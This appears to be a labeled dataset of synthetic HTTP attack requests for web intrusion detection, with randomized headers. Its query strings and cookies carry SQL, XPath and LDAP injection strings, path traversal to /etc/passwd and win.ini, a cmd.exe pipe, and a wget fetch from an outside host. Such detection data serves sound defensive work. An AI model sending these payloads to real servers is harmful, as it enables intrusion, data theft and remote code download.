----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48138
Start - Id: 42322
class: SqlInjection
GET /eLBUh23ylkyqNt.BLPB/3bhf-servicesOZhomeqo/is-d_BtpIhn/o0ylmALtrh2unfl3blo/ptGfPvwehC/hj.jsp?i4BJCEBu1select=a&epdenn=xZ%40Bish._pG&2XknQ=sUPs&aOtllttt=7eaneeaaem+openv&buYe8BhKk7m=null&r0dedmBnnis=%27++++%29+UNION+++ALL+++++SELECT+++%276wlnlypu%27%2C86%2C414%2C%27oitnrqPd%27%2C72++++FROM+trreHeet+++++WHERE++%28+%27%27+%3D++%27 HTTP/1.1
Host: 210.170.99.119
Connection: keep-alive
Accept: video/*, application/*
Accept-Charset: iso-8859-3;q=0.2, us-ascii
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 64.206.153.107
Cookie: 8eoaon=oNNvLS
Cookie2: $Version="97"
Date: Sat, 14 Mar 09 20:47:26 CET
ETag: "Ksz6YAgeD1hO7Ki"
Expect: rlstreu=Tpet8sAn
From: vtsibh@nsti.biz
If-Modified-Since: Sun, 28 Oct 07 03:27:22 CET
If-Unmodified-Since: Fri, 28 Nov 08 01:06:39 UTC
If-Match: "M32w8oPcU6FIGNc9"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 6.3
Pragma: noo=gfqeAmf
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Digest cnonce="sli9ah"
Range: -8
Referer: http://www.acokp.com/g0ae4dE.js
TE: chunked;q=0.6
Trailer: If-Match
User-Agent: tYt-aGZIH http://www.iseaidhd.biz
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: 9.6 226.125.32.118:56
Transfer-Encoding: identity
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 47.158.122.16
X-Serial-Number: 807714416153290560
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42322
Start - Id: 46432
class: PathTransversal
GET /sm_Hib/eoeepnN38/at.cfm?ttHLteae=%29e0g0aVw&CI9lwseeojgp=%2Fetc%2Fhttpd%2Fhttpd.conf&WsamwFwlylogUQ=31805864&aonofimu7ks=v6s%40cB23ya%40y&dmeeSrt=mBrGXzGmlqY&MDZg=468545&o4sm=4etI3aso&Nin5orpsc=77720&ZOyrmetaImV-IgH=Isj3%274bgsounds0&dJvazGQy6from=62666 HTTP/1.1
Host: 51.249.177.136
Connection: keep-alive
Accept: text/plain
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 13.160.243.201
Cookie2: $Version="95"
Date: Wed, 07 Jun 06 13:47:20 CET
ETag: "NKqtyz9ILmI6TEVmkg"
If-Modified-Since: Wed, 30 Dec 09 02:30:08 GMT
If-Unmodified-Since: Wed, 14 Feb 07 11:12:33 CET
If-Match: ".GSQS.ZwWheTSUDj"
If-Range: *
Max-Forwards: 3
MIME-Version: 9.4
Pragma: e=sl
Proxy-Authorization: E0mqn 5bih=ea6O4
Referer: http://feoawt.gov/cp1esi/e5Zs/awlst/1opa/Siaaat.wmn
TE: trailers,trailers,deflate;q=0.9
User-Agent: Mozilla/6.6 (Windows; U; Windows NT 0.3; ee-cs; rv:1.7.2) Gecko/95454249
UA-CPU: MIPS
Via: 0.4 18.127.56.254, dlsno/5.3 www.ltXep.html, 1.9 7.183.19.199
Transfer-Encoding: compress
Warning: 938 www.ezbot.js:68616 "saekynale3effusp" 
X-Forwarded-For: 3.77.163.149

null

End - Id: 46432
Start - Id: 41698
class: SqlInjection
GET /pwt/sAaQhbXeHAWao0euAx5l/itetsts/eK7tC5feXV4.html?hnkroimmEjqeuMy=%27%3B++shutdown--&aemryab=2104817638&niehpnwyaeeo=eT-WTNZLKm&lvqi=aie&npt=th4ne3hdhnuqmedn HTTP/1.0
Host: www.a0e6rasdn8.biz
Connection: close
Accept: image/jpeg;q=0.5, image/png;q=0.2, text/html
Accept-Charset: windows-1252;q=0.3, gb2312, windows-1251, x-mac-cyrillic
Accept-Encoding: identity;q=0.0, compress;q=0.2, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 51.187.24.113
Cookie: aihe3rreOeieT=088240
Cookie2: $Version="017"
Date: Thu, 15 Oct 09 20:56:38 CET
ETag: "ms1MadMBVHvYr8Op"
Expect: nllry
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 09 Jul 06 02:54:29 CET
If-Unmodified-Since: Sun, 15 Oct 06 13:26:38 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Jun 05 13:30:32 CET
Max-Forwards: 5114
MIME-Version: 5.8
Pragma: s='w'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic QXNlbzBuNVM6ZWVyZWJrdHk=
Range: 271923-
Referer: http://ciqeaaLe.fr/onwmw/iuo6/hgeiec/er3oskya.gif
TE: trailers
Trailer: Accept-Language
User-Agent: 8t8ibhootmeyBeu
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 128x875
Via: tce/7.4 170.99.27.27, 7.3 www.eOIioun.png, fnleea/4.2 www.paesu.html
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 137 173.7.112.18 "mIt3it3cidet" "Sun, 16 Sep 07 01:52:40 GMT"
X-Forwarded-For: 200.2.71.249
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41698
Start - Id: 36663
class: OsCommanding
GET /bJ/hiREvUr@g4/e1JCmPV_WFG2HKv/pL6.wSIa/rkeVV/rsF.shtml?uiSq5cowhtrhl=30033&hdrchQ=8Hn%22i+w7%294&aj=dNeaslogmusrwto1rtw&naTgjhOtxe8e=ay0yeaeermAhn&hcese=148.204.27.206+++%7C+++cmd.exe+%2Fs&pLrprex7=aaps2ozi-hP&mHYo7qjvq=203155 HTTP/1.0
Host: www.ea9uO.gov
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Client-ip: 98.172.136.119
Cookie: osyiEm1a=dei;9urjub9icyto=080;Dercarn9o2anr=18;po7iDeiraPrer=769
Cookie2: $Version="0"
Date: Sun, 04 Apr 04 10:42:00 CET
Expect: 100-continue
If-Modified-Since: Sat, 16 May 09 23:40:00 CET
If-Unmodified-Since: Fri, 22 Dec 06 23:00:26 GMT
If-Match: *
If-None-Match: "nyD7@V820F9DFEypo"
If-Range: Thu, 01 Apr 04 12:13:19 UTC
Max-Forwards: 378
Pragma: 6es=ia
Authorization: NTLM dWVlaXlYZXVuaEhCdHJhN2R1THRvcnRveGZmakVzaHQ=
Range: -658323,933536-0,-3
Referer: /oendi4vr/Hoxnmwa.dll
Trailer: Host
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 1.6; cE-3k; rv:5.3.8) Gecko/27714767
Via: HTTP/7.1 www.nlt6.js
Warning: 660 www.iBaqr.jpeg "5ORlnh5fsrPedhIie" "Tue, 25 Oct 05 23:59:57 GMT"
X-Forwarded-For: 203.249.198.130
----: ------------

null

End - Id: 36663
Start - Id: 46455
class: PathTransversal
PUT /ccownpseeesn/0oRWp1PTAfRA.Yv.@/p_KmbnDhTfDqN/itetes2/ipMlAb3jfo1Kr4/lMc.js? HTTP/1.0
Content-Length: 259
Content-Language: e6arar
Content-Encoding: compress
Content-Location: http://nqaaz.de/qnus/gCouiNl/i7sgGd.jpg
Content-MD5: aDllYXpzZmV0UnU3YU1haQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Apr 09 18:22:27 UTC
Last-Modified: Sun, 06 Feb 05 21:36:58 CET
Host: 176.139.209.216
Connection: close
Accept: application/x-tar, text/*, text/xml;q=0.1
Accept-Charset: hz-gb-2312, us-ascii;q=0.2, x-mac-hebrew
Accept-Encoding: *
Accept-Language: *
Cache-Control: si='mku8no'
Client-ip: 178.97.168.133
Cookie: jh1=569;ew=/etc/passwd;kvYbZPG78locationFr=2787784;i4bd=344;rae=?cyobrs
Cookie2: $Version="496"
Date: Wed, 18 Apr 07 04:17:05 UTC
ETag: "KkxgPBxgN.d5cW__M"
If-Modified-Since: Fri, 22 Aug 08 02:57:58 GMT
If-Unmodified-Since: Wed, 04 Nov 09 01:13:53 UTC
If-Match: *
If-None-Match: "Db@Wp4OrBROx@EHdX"
If-Range: "x2fMWqTymyygz9E"
Max-Forwards: 8
Pragma: no-cache
Proxy-Authorization: be1hrk yaoU7=aypDnr7
Authorization: Basic d3NsYWE2czpFYWRlZQ==
Range: -2,-2
Referer: /j6drsuui/nl1td/htveao.mdb
TE: trailers,trailers
User-Agent: Mozilla/7.9 (X11; U; Open BSD i586 3.9; ai-et; rv:9.6.8) Gecko/52681602
UA-CPU: StrongARM
UA-Disp: 739,8713,16
UA-Color: color8
UA-Pixels: 409x6935
Transfer-Encoding: compress
Upgrade: leehiz/2.0, yskn/5.1
Warning: 127 253.189.83.108 "eeutub" "Sat, 17 Apr 10 13:28:15 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

taraqat=8349&fwce=rZehavingahhcerI&soevpfmgeE8ytni=o2tndllReA&oOlhiahn=tdsoe&reaeeienO=622389&ganen12=a59TchDh(rp-m&pml=777981&ma=940&nstp0=Et4A0xp_nechohw&sor2o8yhrnstse=7954993&ThcfEwe=n/rHa&ip3aradEshlm=ncl&uohnt3ch=tc'lsGoa&neojopotry=0SM&msoc=03693

End - Id: 46455
Start - Id: 35349
class: SqlInjection
GET /jAQoB1iq.5/eDqtHqE/itqoowTeqely/ata0osrssiteeibia/1hhm1afhi/snTiasqis1r3tg8tta/huemwsFee8ohie/WX0.k.cfm?DaW4=72262&6uNtrotaecadf1=%3B++++insert+into++++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3D4f%3Bpwd%3DrSnrj%3BNetwork%3DDBMSSOCN%3BAddress%3D156.106.124.70%2C1433%3B%27%2C%27select++++*+++++from+_sysdatabases%27+%29%3B+++++select++++*+++++from+++LinkedOrRemoteSrv1.master.dbo.sysdatabases&9tnoixrqisoqtde=mvu8&ycongba=62665&u0g=Oc%3FNwfy%5C%3B%28&o1i=31&qh3sdftRak=85849&tcznkwpsEas=hdInieato6&ibtnsTohtx8xwjr=0HB2jNKe&aisupaeels9ia=l2k3dmzo5Xhttntoiw&irtft=57752&dhalarrttsl=6&varROS5QsystemVsT=5&EoMyu8rdTue0vsh=p1urz5nteeldh&iocRserenmins=od2e2o2ir HTTP/1.1
Host: www.aetaijete.fr
Connection: close
Accept: */*;q=0.3
Accept-Charset: ks_c_5601-1987;q=0.2, iso-8859-7, euc-jp, windows-1254
Accept-Encoding: deflate, deflate;q=0.0, identity;q=0.0, gzip
Accept-Language: is-ie;q=0.6, MIh-yaees7i, mla1fWks-hcih, YdnsOoi-fa, o-eg;q=0.9
Cache-Control: max-stale=4
Client-ip: 85.208.223.94
Cookie: nrutcnnUr=2;YJUn0ROQxmlA_O=t  
Cookie2: $Version="398"
Date: Tue, 08 Jun 04 09:06:53 GMT
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: senlwad
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Sun, 15 Jan 06 19:48:25 CET
If-Unmodified-Since: Sat, 28 May 05 18:50:44 UTC
If-Match: "r5-JcxehE716_Os"
If-None-Match: "v3yMobDMXwjAnXBj1PP3"
If-Range: Sun, 31 May 09 02:05:32 GMT
Max-Forwards: 391
MIME-Version: 4.3
Pragma: tWh12sdl='ecsaatl'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: NTLM YW9tZWk4TnRlRW11ZW9tdGVldHNwb3JlOGVoYTdhd3Ri
Range: 1609-18413
Referer: http://j5carel.gov/vbguYfsi/iuf3/eb0Oa7/1eole2/driynt.tiff
TE: trailers,chunked,trailers
Trailer: Cache-Control
User-Agent: eEhkp/4.2
UA-CPU: 68000
UA-Disp: 8257,8417,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: FTP/3.9 www.srea7it.png, 5.9 www.als6not.png
Transfer-Encoding: compress
Upgrade: gerh/9.6
Warning: 990 www.iarai.html:3656 "ttstnoOdn" "Mon, 11 Sep 06 03:23:34 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35349
Start - Id: 45548
class: PathTransversal
GET /eaestdneeufi6tatras/r9/re/e55PiHkz/geUJ/iteee/MYsSuiorila8esri/ucb3twsoGssQ0GxTzZ@.exe?ien=iet&lStOfa5apreslbs=hotha&oioe=jl&yeo0=116&na2t=uad&an=gta8L&nstynto=renavDl&ex7eyti4tio=L%3A%5C%5CWINNT%5C%5Cwin.ini HTTP/1.1
Host: 180.117.254.58
Connection: close
Accept: application/zip, audio/*, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ieielfa-u, Nc9uyE6-ornoet, dlRNtp-aqspqp;q=0.3
Cache-Control: min-fresh=35
Client-ip: 15.78.136.11
Cookie: hzrArkq=a q;Ihnsiln=7324;tDteebs2=kf@Ch2bew
Cookie2: $Version="4"
Date: Tue, 10 Feb 09 21:24:25 UTC
ETag: W/"PFUNEE-2p-Js2P9AZMS"
Expect: urperzok
From: hwpha@Suan.org
If-Modified-Since: Sat, 06 Aug 05 09:55:35 UTC
If-Unmodified-Since: Mon, 21 May 07 11:05:12 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: NTLM dmFzZm1ua29vT3NjZW5mZHd0ZXJ0YWFzOERsdWlKZVR1Z2NuY3JrbzBy
Range: 903-3,3-4324,-8
Referer: http://www.fply.org/7nl1sN/adntin3k.swf
TE: trailers,chunked,deflate;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 2.2; li-ts; rv:0.3.6) Gecko/57346208
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 220x9820
Via: HTTP/9.2 86.2.124.28:29375
Transfer-Encoding: compress
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45548
Start - Id: 46053
class: PathTransversal
GET /ogs/dsunjoserha/bIdppf5aA9GJZvs1/7hije@6_2cy@/eV_-4xA7HT0EWYNmYDv/hwoFgyF7oePhHCw64E6C.gif?XstyleJPg-Xvar2https2=5994389&wtabuot=03448289&sfrbEmuTnOOas=re8u&ashtejhotdGnG=amnLiMFQ4i&Deanaj1hasre4f=-rs&yhyiDcUs=%3Asuaa&BFak=xaNsabge&iexezim5d=4eLol&eebM05ie1e=9%29+efpen HTTP/1.1
Host: 36.33.41.136
Connection: asros
Accept: audio/*, text/*, application/*;q=0.4
Accept-Charset: windows-874, iso-8859-8-i;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 232.227.209.2
Cookie: ga6443k8=idht;Dn32kouo42o5t=Crl:;ito=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Cookie2: $Version="74"
Date: Thu, 27 Dec 07 18:52:23 GMT
ETag: "5JIPCcPany@.X45"
Expect: neee=taee
From: wrshBoou@rntia.uk
If-Modified-Since: Sat, 30 Jan 10 05:30:16 GMT
If-Unmodified-Since: Mon, 13 Nov 06 21:41:38 GMT
If-Match: *
If-None-Match: "AZN0GNpAMCg5Rp."
If-Range: Thu, 01 Jun 06 16:35:41 UTC
Max-Forwards: 34
MIME-Version: 1.1
Pragma: RNmi=v
Authorization: Digest realm
Referer: /i8yi/Rmyjeo.php
TE: chunked,gzip
Trailer: TE
User-Agent: iiEryrnh (ujq@5.m; rFJfb.; lm96R@m4; lHZ9B6tmLN)
UA-CPU: MIPS
UA-Disp: 478,2158,8
UA-OS: Solaris
UA-Color: color32
Via: 2.4 163.102.100.176:85090, Iiag/1.4 181.199.181.252, 5.5 120.216.247.246
Transfer-Encoding: identity
Upgrade: domfsc/6.5, zfo9/7.9
Warning: 762 198.204.149.124:790 "fimrmytnwtsNote" "Tue, 03 Jul 07 15:54:22 GMT"
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46053
Start - Id: 41605
class: SqlInjection
GET /SHqeqeyNmo7/a1a/xoz3ZQRlDl7Uyl.jpeg?7oLKTQboot.ini=%27+++UNION++++++++ALL+++++++++SELECT++++vuokl5eoiw+++FROM+++++ehaIn++++WHERE+++%27%27++%3D++++%27&PE.UHt=130&xnuqiiwldVcn=1733554&reu4s5ihe=8598049227&rTtoXhstushN=ioTv HTTP/1.0
Host: www.itduwS9.uk
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: bAnx-piwa, lwtg-Iuadtt;q=0.6
Cache-Control: max-age=08
Client-ip: 66.83.180.190
Cookie: GadminQx9I=s9neptctad;s88hnhrtll=dropsfoegCeoauerX Er;Re5fsolgeig=ix5_1vu5w;ialCczTfaol=sK6goKGK
Cookie2: $Version="7"
Date: Fri, 23 Apr 04 07:41:48 GMT
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: 100-continue
From: tcssd@oays6you.com
If-Modified-Since: Mon, 29 Jun 09 04:44:06 GMT
If-Unmodified-Since: Fri, 27 May 05 21:05:27 UTC
If-Match: "GLj31RWXyy@wOqMjY"
If-None-Match: "X@-Yezx1no71IPp"
If-Range: "U_yPt@IBIvFgpvR"
Max-Forwards: 1357
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: mntre es5jmh0t=sta8dmeb
Authorization: ryxi gNxeosa=uhmefjAm
Range: -827608,0-149272
Referer: http://N4Ta.it/i1o35sNw/oemaeeb/oeut/rsts/ssfledls.css
TE: trailers,trailers,deflate;q=0.7
Trailer: Referer
User-Agent: Mozilla/5.6 (Machintosh; U; Mac OS X 3.2; d2-ca; rv:0.5.6) Gecko/47468093
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 6.0 www.ro3ha6g.png
Transfer-Encoding: identity
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 292 200.190.127.50 "eeuv" "Wed, 26 Jul 06 08:42:22 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41605
Start - Id: 35685
class: XPathInjection
GET /sdRatB-JH/v3P6BvarrSa/hs5Otzhd0bOezhuiei/liwd8/23eHtnem/ys8AGqri6nrsneylob/oHl3/d6hUAdQ/body1Gmfromxhttpw6L6Popenn/ati/nVdMo.shtml?wseswoytoiq=e6arpxni&vcmd31VSAFFXy=Ha7laoualog&mEf=inThe%2Fl%2Feneh%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D5%5D+++++or++++%27ttlcnzld%27++%3D+++%27&iaez1rdtdBrny=ge%3Ew&sthsrltldomc3=ecbo1&oineo2vaeqkhjh=allxmlepbin&8d5J9Sasrfnele=elaSbaF5ree0oae HTTP/1.0
Host: 12.131.116.104
Connection: close
Accept: */*;q=0.3
Accept-Charset: windows-1250;q=0.6, shift_jis;q=0.4, euc-tw;q=0.5, iso-8859-7, x-mac-korean
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 50.131.48.51
Cookie: 4hoeoLkVeedmen=7;bfra=hrcp;rmYFFtCnWaq=nph-e;gus07tcu8=4mlvniembyme
Cookie2: $Version="3"
Date: Tue, 01 Nov 05 10:09:32 CET
ETag: W/"k1U73-zB@DVFTOX"
Expect: 100-continue
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Sun, 17 Aug 08 24:21:45 CET
If-Unmodified-Since: Sat, 28 Jan 06 13:12:41 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 19 Jun 05 02:17:13 GMT
Max-Forwards: 1950
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM Nm9LZW05b2hud3NldTBzbWxlbnplYWVidEYyZGVXQWRkbmlsb1Vua2xuMHNybnRl
Authorization: Digest algorithm=ivyn
Range: -82,-22
Referer: http://www.lbET.st/dxhs/s4ld3T/5an9/ntDiee.gz
TE: chunked;q=0.2,chunked;q=0.6,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.5 (X11; U; Open BSD i386 8.3; s4-wh; rv:8.4.6) Gecko/24230984
UA-CPU: PowerPC
UA-Disp: 7059,6973,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: 8.8 86.46.65.221, 2.3 81.113.129.190, FTP/1.3 www.td8tP.shtml:1
Transfer-Encoding: albn; mniyi=enrne
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35685
Start - Id: 49937
class: XPathInjection
GET /orwtvrrfa/lxRw_O3dCJhpfY2/erntzyn/Asan4/h0PT1Zo0V.u/htngeeueaetyee8a/yeehydtwst/fae/4ea9a7potSIde/ekdovZdBwqFk8G.sh?epN=%28i+++++%3C+++count%28sAti6%2Fchild%3A%3Atext%28%29%29++++and++++j+++%3C++++count%28QJ%2Fchild%3A%3Acomment%28%29%29++++and+++k+++%3C+++count%28hr%2Fchild%3A%3A*%29++%29&4fssqai3dr=+t&g6orPIcs=efrom+u%5Cati HTTP/1.0
Host: www.1eEfwshfDq.biz
Connection: keep-alive
Accept: application/*, audio/*, image/jpeg;q=0.0
Accept-Charset: koi8-r;q=0.0, euc-kr, windows-874;q=0.3, cp-950;q=0.0
Accept-Encoding: identity;q=0.6
Accept-Language: uucn-yEietipe, on-uoo;q=0.5
Cache-Control: no-store
Client-ip: 69.149.110.120
Cookie: LOSgwgetsk=9czXA4ku2aP;0bin6script=nLEo>Apha;nsEnSsnsagX1sn=d>o$noypoe noLopengnplo;isuD3pecEd0ne= /ee<
Cookie2: $Version="924"
Date: Wed, 22 Sep 04 20:14:35 GMT
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: 100-continue
From: cbithw@teurCy.cz
If-Modified-Since: Thu, 25 Jan 07 13:48:17 GMT
If-Unmodified-Since: Thu, 19 Apr 07 19:43:28 CET
If-Match: *
If-None-Match: "muZqlDxp0r9@lt5VLUp"
If-Range: Sat, 22 Dec 07 21:18:00 UTC
Max-Forwards: 3
MIME-Version: 7.1
Pragma: tee='ey'
Proxy-Authorization: Digest nonce
Authorization: NTLM bmhlc3JhZmx0ZHFibzVlY2FvZm1qczNUZW5hbGFObXdzbg==
Range: 1672-72499
Referer: /NsaprcEl/uStD/lhef/Feyieihr/tlr1at.txt
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/0.5 (Windows; U; Win98 3.7; ss-Ss; rv:4.8.3) Gecko/58905556
UA-CPU: x86
UA-Disp: 4764,9289,32
UA-OS: Linux
UA-Pixels: 299x2707
Via: 1.3 45.195.21.116
Transfer-Encoding: deflate
Upgrade: oepjtw/9.0, eribt/2.4, enN/6.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49937
Start - Id: 43291
class: OsCommanding
GET /riv.tOz1eUO@RQ/ebe/sy2sweet6dh/ti/lE_rl@WUsdvQ/e9rhhtentd9nDyh/2ssHcdtttl6Vsoa8nn3d/e_eF/bZBjP8%uoHzKs/4i/sT/e5zoMS.swf?tirEnrsdoicchu=73&lgegeays=04290&nt1=%22++%3B+%2Fusr%2Fbin%2Fwget+www.asteasen.com%2Fne+++++%3B&rhEoeztey=2eide6ntaedthqn&ttAemrw=hc2C0c%40d&lpby8tpoh538=r4jsblidErcp&odh9Sr1eOFeaea=841876&oaI5CeioNoan5e=Erhtpassvn&pon=%25oeeeeslB0ooe7e&a9eae=12050&Haln08r=uJtqp.GxC&wsns=4662932 HTTP/1.1
Host: www.wrPift.st:80
Connection: 8hdnaft1
Accept: */*;q=0.5
Accept-Charset: iso-8859-5, x-mac-arabic, utf-7;q=0.3
Accept-Encoding: 
Accept-Language: seV-o;q=0.2, urenbzt-agNi8uon, leo-pE;q=0.2, sqUalgTn-subt2hon;q=0.4
Cache-Control: only-if-cached
Client-ip: 41.151.127.122
Cookie: 3locationh1=mPro8vtuju;toimcsegjwttsw=tmptgr3=ths;s2nE=eE/9%darA[Brg;cs1D6=rooPsstylen 1nh5c;AU5SGai=7855309
Cookie2: $Version="05"
Date: Mon, 15 Dec 08 09:55:21 CET
ETag: "6dhinw17JjJyr_-."
Expect: 100-continue
From: nJanczi@m0dios.gov
If-Modified-Since: Tue, 27 Apr 04 10:44:03 GMT
If-Unmodified-Since: Sun, 26 Apr 09 18:31:51 UTC
If-Match: *
If-None-Match: "L7XVVs9eNE0iZyugMM.5"
If-Range: Wed, 07 Feb 07 24:19:15 UTC
Max-Forwards: 3
MIME-Version: 0.7
Pragma: tofT=avmteh
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic eW5vaDppZWZIdGlo
Range: 16-654699,-01,-6683
Referer: http://www.ooiye.com/eeivSc/poBntaer/oue8RC6.js
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.7 (Windows; U; WinNT 5.0; zn-vi; rv:8.9.9) Gecko/10799497
UA-CPU: MIPS
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: HTTP/2.6 200.86.88.200, izekyc/8.6 www.ys1ea.tiff
Transfer-Encoding: compress
Upgrade: hhiwe/3.0
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 7001986920061733
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43291
Start - Id: 37209
class: LdapInjection
GET /rn4sfeuyoos8Nn/oswts2rmeetTt7eSr/mcp2o8Ie.js?rmwheredropgCAidbkG=6124&wnirent29vooui=68450457&6wggheratV=9214119266&moiIXgUN=5401&a96heoFtcag28=xnm%2F&dd9=%27z%3F&rw=tiV.%40lNW4tg&kwlsensdsisr=%29+%28+%7C+%28cn%3D*o%27brien*%29%28mail+%3D*o+%27brien*+++%29+&ssvh=138798311&5mwcgrlrmBrm=dxmetMvar6ehRe+hl&c5aeeom2=4&H9tf_l=13681040 HTTP/1.1
Host: www.rn8s0i.uk
Connection: keep-alive
Accept: application/*;q=0.4, text/*;q=0.2, image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-age=96735
Client-ip: 98.210.207.217
Cookie: swFvosbesmm=8taoercpsmeeit;dkc=0410525
Cookie2: $Version="43"
Date: Tue, 11 Mar 08 03:33:43 CET
ETag: W/"nGU3RVy8tOKIK4L"
Expect: 100-continue
From: ejgouV@q9tOejr.uk
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Mon, 26 Jan 04 21:19:33 UTC
If-Match: *
If-None-Match: "l8o8XG_Hq8otMWC"
If-Range: Sun, 08 Jun 08 10:35:19 GMT
Max-Forwards: 7
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZHdiZFdlOm9kaWdlVWF0
Authorization: wEne ojRSaei=oicss9
Range: 605-286224
Referer: http://Hjuahntt.de/ee34/soqnfE/athlaa/sPiehjc.png
TE: deflate,gzip,chunked;q=0.9
Trailer: Max-Forwards
User-Agent: usTen (cD3Nah1; l8zW7cu; lsdIgRFL7; cp0QrcA0)
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: t8k/4.6 214.231.56.109
Transfer-Encoding: y6RE; asg5=ntblc7a
Upgrade: etyvet/1.7, 9mEHd/4.9, saaq/1.8, 9irhSi/8.2, ooten3/4.3
Warning: 831 www.3uaaedte.jpg "Tszrxr" 
X-Forwarded-For: 209.47.70.154
X-Serial-Number: 973297601016037015
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37209
Start - Id: 39784
class: SSI
